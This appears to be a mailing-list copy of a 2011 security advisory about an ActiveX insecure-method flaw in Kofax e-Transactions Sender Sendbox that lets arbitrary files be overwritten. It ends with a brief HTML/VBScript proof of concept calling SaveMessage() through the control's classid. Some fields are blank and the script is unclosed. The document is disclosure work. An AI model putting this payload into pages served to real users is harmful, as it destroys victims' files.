[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

HTB23016: Kofax e-Transactions Sender Sendbox ActiveX Control Insecure Method

Vulnerability ID: HTB23016
Reference: http://www.htbridge.ch/advisory/kofax_e_transactions_sender_sendbox_activex_control_savemessage_insecure_method.html
Product: Kofax e-Transactions Sender Sendbox
Vendor: Kofax, Inc ( http://www.kofax.com/ ) 
Vulnerable Version: and probably prior
Tested on:
Vendor Notification: 01 June 2011 
Vulnerability Type: ActiveX Control Insecure Method
Risk level: Medium 
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ ) 

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered a vulnerability in Kofax e-Transactions Sender Sendbox, which can be exploited to overwrite arbitrary files.

The vulnerability is caused due to the LEADeMail.LEADSmtp.20 (LTCML14n.dll ( ActiveX control including the insecure "SaveMessage()" method. This can be exploited to overwrite with junk data arbitrary files in the context of the currently logged-on user.

The following PoC code is available:

<object classid='clsid:0014085F-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>

Sub Boom()
  target.SaveMessage arg1 ,arg2
End Sub